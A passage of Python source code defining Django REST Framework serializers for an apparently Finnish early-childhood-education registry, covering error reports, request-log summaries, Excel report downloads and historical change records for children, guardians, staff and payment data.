'sukunimi',\n 'oma_organisaatio_id', 'oma_organisaatio_oid', 'oma_organisaatio_nimi',\n 'paos_organisaatio_id', 'paos_organisaatio_oid', 'paos_organisaatio_nimi',\n 'errors')\n\n\nclass ErrorReportTyontekijatSerializer(AbstractHenkiloErrorReportSerializer):\n tyontekija_id = serializers.IntegerField(source='id')\n\n class Meta:\n model = Tyontekija\n fields = ('tyontekija_id', 'henkilo_id', 'henkilo_oid', 'etunimet', 'sukunimi', 'errors')\n\n\nclass ErrorReportToimipaikatSerializer(AbstractErrorReportSerializer):\n toimipaikka_id = serializers.IntegerField(source='id')\n\n class Meta:\n model = Toimipaikka\n fields = ('toimipaikka_id', 'nimi', 'organisaatio_oid', 'vakajarjestaja_id', 'errors')\n\n\nclass TiedonsiirtoListSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n reverse_param = self.context['request'].query_params.get('reverse', 'False')\n if reverse_param in ('true', 'True',):\n # If reverse is activated, i.e. user has clicked to the last page (sorting by timestamp ascending),\n # reverse the list so that results in a page are ordered by timestamp descending\n data.reverse()\n return super(TiedonsiirtoListSerializer, self).to_representation(data)\n\n\nclass TiedonsiirtoSerializer(serializers.ModelSerializer):\n target = serializers.SerializerMethodField(read_only=True)\n user_id = serializers.IntegerField(read_only=True, source='user.id')\n username = serializers.CharField(read_only=True, source='user.username')\n vakajarjestaja_id = serializers.IntegerField(read_only=True, source='vakajarjestaja.id')\n vakajarjestaja_name = serializers.CharField(read_only=True, source='vakajarjestaja.nimi')\n\n class Meta:\n model = Z6_RequestLog\n fields = ('request_url', 'request_method', 'request_body', 'response_code', 'response_body',\n 'lahdejarjestelma', 'target', 'user_id', 'username', 'vakajarjestaja_id', 'vakajarjestaja_name',\n 'timestamp')\n list_serializer_class = TiedonsiirtoListSerializer\n\n def get_target(self, instance):\n target_model = instance.target_model\n target_id = instance.target_id\n target = {}\n if target_model in ['Lapsi', 'Tyontekija']:\n if target_model == 'Lapsi':\n id_name = 'lapsi_id'\n else:\n id_name = 'tyontekija_id'\n\n try:\n target_object = apps.get_model('varda', target_model).objects.get(id=target_id)\n except (LookupError, ObjectDoesNotExist):\n # Could not find target object\n return None\n\n target[id_name] = instance.target_id\n target['henkilo_oid'] = target_object.henkilo.henkilo_oid\n target['etunimet'] = target_object.henkilo.etunimet\n target['sukunimi'] = target_object.henkilo.sukunimi\n return target\n\n\nclass TiedonsiirtoYhteenvetoSerializer(serializers.Serializer):\n date = serializers.DateField(read_only=True)\n successful = serializers.IntegerField(read_only=True)\n unsuccessful = serializers.IntegerField(read_only=True)\n user_id = serializers.IntegerField(read_only=True, source='user__id')\n username = serializers.CharField(read_only=True, source='user__username')\n\n class Meta:\n list_serializer_class = TiedonsiirtoListSerializer\n\n\nclass ExcelReportSerializer(serializers.ModelSerializer):\n organisaatio = OrganisaatioPermissionCheckedHLField(view_name='organisaatio-detail', required=False,\n permission_groups=[Z4_CasKayttoOikeudet.RAPORTTIEN_KATSELIJA])\n organisaatio_oid = OidRelatedField(object_type=Organisaatio,\n parent_field='organisaatio',\n parent_attribute='organisaatio_oid',\n prevalidator=validators.validate_organisaatio_oid,\n either_required=False)\n toimipaikka = ToimipaikkaHLField(view_name='toimipaikka-detail', required=False)\n toimipaikka_oid = OidRelatedField(object_type=Toimipaikka,\n parent_field='toimipaikka',\n parent_attribute='organisaatio_oid',\n prevalidator=validators.validate_organisaatio_oid,\n either_required=False)\n toimipaikka_nimi = serializers.CharField(read_only=True, source='toimipaikka.nimi', allow_null=True)\n url = serializers.SerializerMethodField()\n password = serializers.SerializerMethodField()\n\n class Meta:\n model = Z8_ExcelReport\n exclude = ('s3_object_path',)\n read_only_fields = ('id', 'filename', 'status', 'password', 'user', 'timestamp', 's3_object_path')\n\n def validate_report_type(self, value):\n if value not in [report_type.value for report_type in ExcelReportType]:\n raise ValidationError([ErrorMessages.ER002.value])\n return value\n\n def validate_report_subtype(self, value):\n if value and value not in [report_subtype.value for report_subtype in ExcelReportSubtype]:\n raise ValidationError([ErrorMessages.ER002.value])\n return value\n\n def validate(self, data):\n if not data.get('organisaatio', None) and data['report_type'] not in [ExcelReportType.VUOSIRAPORTTI.value]:\n raise ValidationError({'organisaatio': [ErrorMessages.GE001.value]})\n return data\n\n @swagger_serializer_method(serializer_or_field=serializers.URLField)\n def get_url(self, instance):\n kwargs = self.context['view'].kwargs\n if not kwargs.get('pk', None) or instance.status != ReportStatus.FINISHED.value:\n # Not retrieve or Excel report not finished\n return None\n\n if settings.PRODUCTION_ENV or settings.QA_ENV:\n s3_client = S3Client()\n # Creates a temporary link to the file, which is valid for 10 seconds\n return s3_client.create_presigned_url(get_s3_object_name(instance), expiration=10)\n else:\n return reverse('excel-reports-download', kwargs=kwargs, request=self.context['request'])\n\n def get_password(self, instance):\n return decrypt_excel_report_password(instance.password, instance.id)\n\n\nclass DuplicateLapsiVarhaiskasvatuspaatosSerializer(serializers.ModelSerializer):\n varhaiskasvatussuhde_list = serializers.SerializerMethodField()\n\n class Meta:\n model = Varhaiskasvatuspaatos\n fields = ('id', 'varhaiskasvatussuhde_list',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.IntegerField()))\n def get_varhaiskasvatussuhde_list(self, instance):\n return instance.varhaiskasvatussuhteet.values_list('id', flat=True)\n\n\nclass DuplicateLapsiLapsiSerializer(serializers.ModelSerializer):\n varhaiskasvatuspaatos_list = DuplicateLapsiVarhaiskasvatuspaatosSerializer(many=True,\n source='varhaiskasvatuspaatokset')\n maksutieto_list = serializers.SerializerMethodField()\n\n class Meta:\n model = Lapsi\n fields = ('id', 'varhaiskasvatuspaatos_list', 'maksutieto_list',)\n\n @swagger_serializer_method(serializer_or_field=serializers.ListField(child=serializers.IntegerField()))\n def get_maksutieto_list(self, instance):\n maksutieto_id_set = set(instance.huoltajuussuhteet.values_list('maksutiedot__id', flat=True).distinct('id'))\n # There may be None values if Huoltajuussuhde does not have related Maksutieto objects\n maksutieto_id_set.discard(None)\n return maksutieto_id_set\n\n\nclass DuplicateLapsiSerializer(serializers.Serializer):\n henkilo_id = serializers.CharField(source='henkilo.id')\n etunimet = serializers.CharField(source='henkilo.etunimet')\n kutsumanimi = serializers.CharField(source='henkilo.kutsumanimi')\n sukunimi = serializers.CharField(source='henkilo.sukunimi')\n henkilo_oid = serializers.CharField(source='henkilo.henkilo_oid')\n henkilotunnus = serializers.SerializerMethodField()\n vakatoimija_id = serializers.CharField(source='vakatoimija.id')\n vakatoimija_nimi = serializers.CharField(source='vakatoimija.nimi')\n vakatoimija_oid = serializers.CharField(source='vakatoimija.organisaatio_oid')\n lapsi_list = DuplicateLapsiLapsiSerializer(many=True)\n\n class Meta:\n fields = ('henkilo_id', 'etunimet', 'kutsumanimi', 'sukunimi', 'henkilo_oid', 'henkilotunnus',\n 'vakatoimija_id', 'vakatoimija_nimi', 'vakatoimija_oid',)\n\n def to_representation(self, instance):\n instance['henkilo'] = Henkilo.objects.get(id=instance['henkilo'])\n instance['vakatoimija'] = Organisaatio.objects.get(id=instance['vakatoimija'])\n instance['lapsi_list'] = instance['henkilo'].lapsi.filter(vakatoimija=instance['vakatoimija'])\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n try:\n decrypted_hetu = decrypt_henkilotunnus(instance['henkilo'].henkilotunnus, henkilo_id=instance['henkilo'].id)\n return decrypted_hetu\n except CustomServerErrorException:\n return None\n\n\nclass TransferOutageReportSerializer(serializers.Serializer):\n user_id = serializers.IntegerField(source='user__id', allow_null=True)\n username = serializers.CharField(source='user__username', allow_null=True)\n vakajarjestaja_id = serializers.IntegerField(source='vakajarjestaja__id', allow_null=True)\n vakajarjestaja_nimi = serializers.CharField(source='vakajarjestaja__nimi', allow_null=True)\n vakajarjestaja_oid = serializers.CharField(source='vakajarjestaja__organisaatio_oid', allow_null=True)\n lahdejarjestelma = serializers.CharField(allow_null=True)\n last_successful_max = serializers.DateTimeField(allow_null=True)\n last_unsuccessful_max = serializers.DateTimeField(allow_null=True)\n\n\nclass RequestCountSerializer(serializers.ModelSerializer):\n successful = serializers.SerializerMethodField()\n\n class Meta:\n model = Z6_RequestCount\n fields = ('request_url_simple', 'request_method', 'response_code', 'count', 'successful')\n\n @swagger_serializer_method(serializer_or_field=serializers.BooleanField)\n def get_successful(self, instance):\n return instance.response_code in SUCCESSFUL_STATUS_CODE_LIST\n\n\nclass RequestSummarySerializer(serializers.ModelSerializer):\n user_id = serializers.IntegerField(source='user.id', allow_null=True)\n username = serializers.CharField(source='user.username', allow_null=True)\n vakajarjestaja_id = serializers.IntegerField(source='vakajarjestaja.id', allow_null=True)\n vakajarjestaja_nimi = serializers.CharField(source='vakajarjestaja.nimi', allow_null=True)\n vakajarjestaja_oid = serializers.CharField(source='vakajarjestaja.organisaatio_oid', allow_null=True)\n ratio = serializers.FloatField()\n request_counts = serializers.SerializerMethodField()\n\n class Meta:\n model = Z6_RequestSummary\n fields = ('user_id', 'username', 'vakajarjestaja_id', 'vakajarjestaja_nimi', 'vakajarjestaja_oid',\n 'lahdejarjestelma', 'request_url_simple', 'summary_date', 'successful_count', 'unsuccessful_count',\n 'ratio', 'request_counts',)\n\n @swagger_serializer_method(serializer_or_field=RequestCountSerializer)\n def get_request_counts(self, instance):\n request_count_qs = instance.request_counts.all().order_by('-count')\n return RequestCountSerializer(request_count_qs, many=True).data\n\n\nclass RequestCountGroupSerializer(serializers.Serializer):\n request_url_simple = serializers.CharField()\n request_method = serializers.CharField()\n response_code = serializers.IntegerField()\n count = serializers.IntegerField(source='sum')\n successful = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=serializers.BooleanField)\n def get_successful(self, instance):\n return instance['response_code'] in SUCCESSFUL_STATUS_CODE_LIST\n\n\nclass RequestSummaryGroupSerializer(serializers.Serializer):\n user_id = serializers.IntegerField(source='user__id', allow_null=True)\n username = serializers.CharField(source='user__username', allow_null=True)\n vakajarjestaja_id = serializers.IntegerField(source='vakajarjestaja__id', allow_null=True)\n vakajarjestaja_nimi = serializers.CharField(source='vakajarjestaja__nimi', allow_null=True)\n vakajarjestaja_oid = serializers.CharField(source='vakajarjestaja__organisaatio_oid', allow_null=True)\n lahdejarjestelma = serializers.CharField(allow_null=True)\n request_url_simple = serializers.CharField(allow_null=True)\n ratio = serializers.FloatField()\n successful_count = serializers.IntegerField(source='successful_sum')\n unsuccessful_count = serializers.IntegerField(source='unsuccessful_sum')\n request_counts = serializers.SerializerMethodField()\n\n @swagger_serializer_method(serializer_or_field=RequestCountGroupSerializer)\n def get_request_counts(self, instance):\n request_count_qs = (Z6_RequestCount.objects\n .filter(request_summary__id__in=instance['id_list'])\n .values('request_url_simple', 'request_method', 'response_code')\n .annotate(sum=Sum('count'))\n .values('request_url_simple', 'request_method', 'response_code', 'sum')\n .order_by('-sum'))\n return RequestCountGroupSerializer(request_count_qs, many=True).data\n\n\nclass HistoricalBaseSerializer(serializers.Serializer):\n action = serializers.SerializerMethodField()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if 'view' in self.context:\n # view is not present in context in Swagger\n self.datetime_gt = self.context['view'].datetime_gt\n self.datetime_lte = self.context['view'].datetime_lte\n self.secondary_muutos_pvm = None\n\n def get_action(self, instance):\n if instance.history_type == '-':\n return ChangeType.DELETED.value\n if self.datetime_gt < instance.luonti_pvm <= self.datetime_lte:\n return ChangeType.CREATED.value\n if (getattr(instance, 'last_parent_id', None) is not None and\n getattr(instance, 'previous_parent_id', None) is not None and\n instance.last_parent_id != instance.previous_parent_id):\n return ChangeType.MOVED.value\n if self.datetime_gt < instance.muutos_pvm <= self.datetime_lte:\n return ChangeType.MODIFIED.value\n\n # Also verify secondary muutos_pvm (Henkilo.muutos_pvm for Lapsi, Huoltaja and Tyontekija objects)\n if self.secondary_muutos_pvm and self.datetime_gt < self.secondary_muutos_pvm <= self.datetime_lte:\n return ChangeType.MODIFIED.value\n\n return ChangeType.UNCHANGED.value\n\n\nclass TkBaseListSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n # Remove instances that have been added and deleted during the time range\n datetime_gt = self.context['view'].datetime_gt\n data = [instance for instance in data\n if instance.history_type != '-' or (instance.history_type == '-' and instance.luonti_pvm < datetime_gt)]\n\n return super().to_representation(data)\n\n\nclass TkToiminnallinenPainotusSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = ToiminnallinenPainotus\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'toimintapainotus_koodi', 'alkamis_pvm', 'paattymis_pvm')\n\n\nclass TkKielipainotusSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = KieliPainotus\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'kielipainotus_koodi', 'alkamis_pvm', 'paattymis_pvm')\n\n\nclass TkToimipaikkaSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n toiminnalliset_painotukset = serializers.SerializerMethodField()\n kielipainotukset = serializers.SerializerMethodField()\n\n class Meta:\n model = Toimipaikka\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'nimi', 'organisaatio_oid', 'kunta_koodi', 'sahkopostiosoite', 'kayntiosoite',\n 'kayntiosoite_postinumero', 'kayntiosoite_postitoimipaikka', 'postiosoite', 'postinumero',\n 'postitoimipaikka', 'puhelinnumero', 'kasvatusopillinen_jarjestelma_koodi', 'toimintamuoto_koodi',\n 'asiointikieli_koodi', 'jarjestamismuoto_koodi', 'varhaiskasvatuspaikat', 'alkamis_pvm',\n 'paattymis_pvm', 'toiminnalliset_painotukset', 'kielipainotukset')\n\n @swagger_serializer_method(serializer_or_field=TkToiminnallinenPainotusSerializer)\n def get_toiminnalliset_painotukset(self, instance):\n painotus_qs = (ToiminnallinenPainotus.history\n .filter(toimipaikka_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte).distinct('id').order_by('id', '-history_date'))\n return TkToiminnallinenPainotusSerializer(painotus_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkKielipainotusSerializer)\n def get_kielipainotukset(self, instance):\n painotus_qs = (KieliPainotus.history\n .filter(toimipaikka_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte).distinct('id').order_by('id', '-history_date'))\n return TkKielipainotusSerializer(painotus_qs, many=True, context=self.context).data\n\n\nclass TkTilapainenHenkilostoSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = TilapainenHenkilosto\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'kuukausi', 'tuntimaara', 'tyontekijamaara')\n\n\nclass TkOrganisaatiotSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n toimipaikat = serializers.SerializerMethodField()\n tilapainen_henkilosto = serializers.SerializerMethodField()\n\n class Meta:\n model = Organisaatio\n fields = ('id', 'action', 'nimi', 'organisaatio_oid', 'y_tunnus', 'kunta_koodi', 'sahkopostiosoite',\n 'kayntiosoite', 'kayntiosoite_postinumero', 'kayntiosoite_postitoimipaikka', 'postiosoite',\n 'postinumero', 'postitoimipaikka', 'puhelinnumero', 'ytjkieli', 'yritysmuoto', 'organisaatiotyyppi',\n 'alkamis_pvm', 'paattymis_pvm', 'toimipaikat', 'tilapainen_henkilosto')\n\n @swagger_serializer_method(serializer_or_field=TkToimipaikkaSerializer)\n def get_toimipaikat(self, instance):\n id_qs = get_related_object_changed_id_qs(Toimipaikka.get_name(), self.datetime_gt, self.datetime_lte,\n additional_filters=Q(parent_instance_id=instance.id))\n\n last_parent_subquery = get_history_value_subquery(Toimipaikka, 'vakajarjestaja_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Toimipaikka, 'vakajarjestaja_id', self.datetime_gt)\n toimipaikka_qs = (Toimipaikka.history.filter(id__in=Subquery(id_qs), vakajarjestaja_id=instance.id,\n history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkToimipaikkaSerializer(toimipaikka_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkTilapainenHenkilostoSerializer)\n def get_tilapainen_henkilosto(self, instance):\n last_parent_subquery = get_history_value_subquery(TilapainenHenkilosto, 'vakajarjestaja_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(TilapainenHenkilosto, 'vakajarjestaja_id', self.datetime_gt)\n tilapainen_henkilosto_qs = (TilapainenHenkilosto.history\n .filter(vakajarjestaja_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery,\n previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkTilapainenHenkilostoSerializer(tilapainen_henkilosto_qs, many=True, context=self.context).data\n\n\nclass TkVakasuhdeSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = Varhaiskasvatussuhde\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'toimipaikka_id', 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass TkVakapaatosSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n varhaiskasvatussuhteet = serializers.SerializerMethodField()\n\n class Meta:\n model = Varhaiskasvatuspaatos\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'pikakasittely_kytkin', 'vuorohoito_kytkin', 'paivittainen_vaka_kytkin',\n 'kokopaivainen_vaka_kytkin', 'tilapainen_vaka_kytkin', 'jarjestamismuoto_koodi',\n 'tuntimaara_viikossa', 'hakemus_pvm', 'alkamis_pvm', 'paattymis_pvm', 'varhaiskasvatussuhteet',)\n\n @swagger_serializer_method(serializer_or_field=TkVakasuhdeSerializer)\n def get_varhaiskasvatussuhteet(self, instance):\n vakasuhde_qs = (Varhaiskasvatussuhde.history\n .filter(varhaiskasvatuspaatos_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte).distinct('id').order_by('id', '-history_date'))\n return TkVakasuhdeSerializer(vakasuhde_qs, many=True, context=self.context).data\n\n\nclass TkHuoltajuussuhdeSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n etunimet = serializers.CharField(source='henkilo_instance.etunimet', allow_null=True)\n sukunimi = serializers.CharField(source='henkilo_instance.sukunimi', allow_null=True)\n henkilo_oid = serializers.CharField(source='henkilo_instance.henkilo_oid', allow_null=True)\n henkilotunnus = serializers.SerializerMethodField()\n katuosoite = serializers.CharField(source='henkilo_instance.katuosoite', allow_null=True)\n postinumero = serializers.CharField(source='henkilo_instance.postinumero', allow_null=True)\n postitoimipaikka = serializers.CharField(source='henkilo_instance.postitoimipaikka', allow_null=True)\n\n class Meta:\n model = Huoltajuussuhde\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'etunimet', 'sukunimi', 'henkilo_oid', 'henkilotunnus', 'katuosoite',\n 'postinumero', 'postitoimipaikka',)\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n self.secondary_muutos_pvm = getattr(henkilo, 'muutos_pvm', None)\n instance.henkilo_instance = henkilo\n\n return super().to_representation(instance)\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n\nclass TkMaksutietoHuoltajaSerializer(serializers.Serializer):\n henkilo_oid = serializers.CharField()\n henkilotunnus = serializers.CharField()\n\n\nclass TkMaksutietoSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n huoltajat = serializers.SerializerMethodField()\n\n class Meta:\n model = Maksutieto\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'maksun_peruste_koodi', 'perheen_koko', 'asiakasmaksu', 'palveluseteli_arvo',\n 'alkamis_pvm', 'paattymis_pvm', 'huoltajat',)\n\n @swagger_serializer_method(serializer_or_field=TkMaksutietoHuoltajaSerializer)\n def get_huoltajat(self, instance):\n # Get data of Henkilo objects that are related to the Maksutieto object during the time window\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n # We need to join historical tables so raw SQL query is simpler\n with connection.cursor() as cursor:\n cursor.execute('''\n SELECT DISTINCT ON(hhu.henkilo_id) hhu.henkilo_id, hhe.henkilo_oid, he.henkilo_oid, hhe.henkilotunnus, he.henkilotunnus\n FROM varda_historicalmaksutietohuoltajuussuhde hmhs\n LEFT JOIN varda_historicalhuoltajuussuhde hhs ON hmhs.huoltajuussuhde_id = hhs.id\n LEFT JOIN varda_historicalhuoltaja hhu ON hhs.huoltaja_id = hhu.id\n LEFT JOIN varda_historicalhenkilo hhe ON hhe.id = hhu.henkilo_id\n LEFT JOIN varda_henkilo he ON he.id = hhu.henkilo_id\n WHERE hmhs.maksutieto_id = %s AND hmhs.history_date <= %s\n ORDER BY hhu.henkilo_id, hhe.history_date DESC;\n ''', [instance.id, self.datetime_lte])\n\n huoltaja_list = [{'henkilo_oid': result[1] or result[2],\n 'henkilotunnus': (decrypt_henkilotunnus(result[3], henkilo_id=result[0], raise_error=False) or\n decrypt_henkilotunnus(result[4], henkilo_id=result[0], raise_error=False))}\n for result in cursor.fetchall()]\n return TkMaksutietoHuoltajaSerializer(huoltaja_list, many=True).data\n\n\nclass TkVakatiedotSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n etunimet = serializers.CharField(source='henkilo_instance.etunimet', allow_null=True)\n sukunimi = serializers.CharField(source='henkilo_instance.sukunimi', allow_null=True)\n henkilo_oid = serializers.CharField(source='henkilo_instance.henkilo_oid', allow_null=True)\n henkilotunnus = serializers.SerializerMethodField()\n syntyma_pvm = serializers.DateField(source='henkilo_instance.syntyma_pvm', allow_null=True)\n sukupuoli_koodi = serializers.CharField(source='henkilo_instance.sukupuoli_koodi', allow_null=True)\n aidinkieli_koodi = serializers.CharField(source='henkilo_instance.aidinkieli_koodi', allow_null=True)\n kotikunta_koodi = serializers.CharField(source='henkilo_instance.kotikunta_koodi', allow_null=True)\n katuosoite = serializers.CharField(source='henkilo_instance.katuosoite', allow_null=True)\n postinumero = serializers.CharField(source='henkilo_instance.postinumero', allow_null=True)\n postitoimipaikka = serializers.CharField(source='henkilo_instance.postitoimipaikka', allow_null=True)\n varhaiskasvatuspaatokset = serializers.SerializerMethodField()\n huoltajat = serializers.SerializerMethodField()\n maksutiedot = serializers.SerializerMethodField()\n\n class Meta:\n model = Lapsi\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'etunimet', 'sukunimi', 'henkilo_oid', 'henkilotunnus', 'syntyma_pvm',\n 'sukupuoli_koodi', 'aidinkieli_koodi', 'kotikunta_koodi', 'katuosoite', 'postinumero',\n 'postitoimipaikka', 'vakatoimija_id', 'paos_kytkin', 'oma_organisaatio_id', 'paos_organisaatio_id',\n 'varhaiskasvatuspaatokset', 'huoltajat', 'maksutiedot',)\n\n def to_representation(self, instance):\n # Get henkilo data from history table or actual table (history is incomplete in test environments)\n henkilo = (Henkilo.history.filter(id=instance.henkilo_id, history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date').first())\n if not henkilo:\n henkilo = Henkilo.objects.filter(id=instance.henkilo_id).first()\n self.secondary_muutos_pvm = getattr(henkilo, 'muutos_pvm', None)\n instance.henkilo_instance = henkilo\n\n # varda_historicallapsi does not contain all vakatoimija_id changes because the field has been updated\n # directly in db, so try to get it from varda_lapsi table\n if not instance.paos_kytkin and not instance.vakatoimija_id:\n instance.vakatoimija_id = getattr(Lapsi.objects.filter(id=instance.id).first(), 'vakatoimija_id', None)\n\n lapsi = super().to_representation(instance)\n return lapsi\n\n def get_henkilotunnus(self, instance):\n henkilotunnus = getattr(instance.henkilo_instance, 'henkilotunnus', None)\n henkilo_id = getattr(instance.henkilo_instance, 'id', None)\n return decrypt_henkilotunnus(henkilotunnus, henkilo_id=henkilo_id, raise_error=False)\n\n @swagger_serializer_method(serializer_or_field=TkVakapaatosSerializer)\n def get_varhaiskasvatuspaatokset(self, instance):\n id_qs = get_related_object_changed_id_qs(Varhaiskasvatuspaatos.get_name(), self.datetime_gt,\n self.datetime_lte, additional_filters=Q(parent_instance_id=instance.id))\n\n last_parent_subquery = get_history_value_subquery(Varhaiskasvatuspaatos, 'lapsi_id', self.datetime_lte)\n previous_parent_subquery = get_history_value_subquery(Varhaiskasvatuspaatos, 'lapsi_id', self.datetime_gt)\n vakapaatos_qs = (Varhaiskasvatuspaatos.history\n .filter(id__in=Subquery(id_qs), lapsi_id=instance.id, history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkVakapaatosSerializer(vakapaatos_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkHuoltajuussuhdeSerializer)\n def get_huoltajat(self, instance):\n id_tuple = tuple(get_related_object_changed_id_qs(\n Lapsi.get_name(), self.datetime_gt, self.datetime_lte, return_value='trigger_instance_id',\n additional_filters=Q(instance_id=instance.id) & Q(trigger_model_name=Huoltajuussuhde.get_name())\n )) or (-1,)\n\n # Get a list of Huoltajuussuhde objects that have been modified, or a related Henkilo object has been modified\n # during the time window\n # We need to join historical tables so raw SQL query is simpler (to get henkilo_id)\n huoltajuussuhde_qs = Huoltajuussuhde.history.raw('''\n SELECT DISTINCT ON (hhs.id) hhs.*, hh.henkilo_id as henkilo_id\n FROM varda_historicalhuoltajuussuhde hhs\n LEFT JOIN varda_historicalhuoltaja hh ON hh.id = hhs.huoltaja_id\n WHERE hhs.lapsi_id = %s AND hhs.id IN %s AND hhs.history_date <= %s\n ORDER BY hhs.id, hhs.history_date DESC;\n ''', [instance.id, id_tuple, self.datetime_lte])\n return TkHuoltajuussuhdeSerializer(huoltajuussuhde_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkMaksutietoSerializer)\n def get_maksutiedot(self, instance):\n id_qs = get_related_object_changed_id_qs(\n Lapsi.get_name(), self.datetime_gt, self.datetime_lte, return_value='parent_instance_id',\n additional_filters=Q(instance_id=instance.id) & Q(trigger_model_name=MaksutietoHuoltajuussuhde.get_name())\n )\n\n last_parent_subquery = Subquery(\n Z9_RelatedObjectChanged.objects\n .filter(parent_instance_id=OuterRef('id'), parent_model_name=Maksutieto.get_name(),\n history_type='+', changed_timestamp__lte=self.datetime_lte)\n .distinct('parent_instance_id').order_by('parent_instance_id', '-changed_timestamp')\n .values('instance_id')\n )\n previous_parent_subquery = Subquery(\n Z9_RelatedObjectChanged.objects\n .filter(parent_instance_id=OuterRef('id'), parent_model_name=Maksutieto.get_name(),\n history_type='+', changed_timestamp__lte=self.datetime_gt)\n .distinct('parent_instance_id').order_by('parent_instance_id', '-changed_timestamp')\n .values('instance_id')\n )\n maksutieto_qs = (Maksutieto.history.filter(id__in=Subquery(id_qs), history_date__lte=self.datetime_lte)\n .annotate(last_parent_id=last_parent_subquery, previous_parent_id=previous_parent_subquery)\n .filter(last_parent_id=instance.id)\n .distinct('id').order_by('id', '-history_date'))\n return TkMaksutietoSerializer(maksutieto_qs, many=True, context=self.context).data\n\n\nclass TkPidempiPoissaoloSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = PidempiPoissaolo\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass TkTyoskentelypaikkaSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = Tyoskentelypaikka\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'toimipaikka_id', 'tehtavanimike_koodi', 'kelpoisuus_kytkin',\n 'kiertava_tyontekija_kytkin', 'alkamis_pvm', 'paattymis_pvm',)\n\n\nclass TkPalvelussuhdeSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n tyoskentelypaikat = serializers.SerializerMethodField()\n pidemmat_poissaolot = serializers.SerializerMethodField()\n\n class Meta:\n model = Palvelussuhde\n list_serializer_class = TkBaseListSerializer\n fields = ('id', 'action', 'tyosuhde_koodi', 'tyoaika_koodi', 'tutkinto_koodi', 'tyoaika_viikossa',\n 'alkamis_pvm', 'paattymis_pvm', 'tyoskentelypaikat', 'pidemmat_poissaolot',)\n\n @swagger_serializer_method(serializer_or_field=TkTyoskentelypaikkaSerializer)\n def get_tyoskentelypaikat(self, instance):\n tyoskentelypaikka_qs = (Tyoskentelypaikka.history\n .filter(palvelussuhde_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date'))\n return TkTyoskentelypaikkaSerializer(tyoskentelypaikka_qs, many=True, context=self.context).data\n\n @swagger_serializer_method(serializer_or_field=TkPidempiPoissaoloSerializer)\n def get_pidemmat_poissaolot(self, instance):\n pidempi_poissaolo_qs = (PidempiPoissaolo.history\n .filter(palvelussuhde_id=instance.id, history_date__gt=self.datetime_gt,\n history_date__lte=self.datetime_lte)\n .distinct('id').order_by('id', '-history_date'))\n return TkPidempiPoissaoloSerializer(pidempi_poissaolo_qs, many=True, context=self.context).data\n\n\nclass TkTutkintoSerializer(HistoricalBaseSerializer, serializers.ModelSerializer):\n class Meta:\n model = 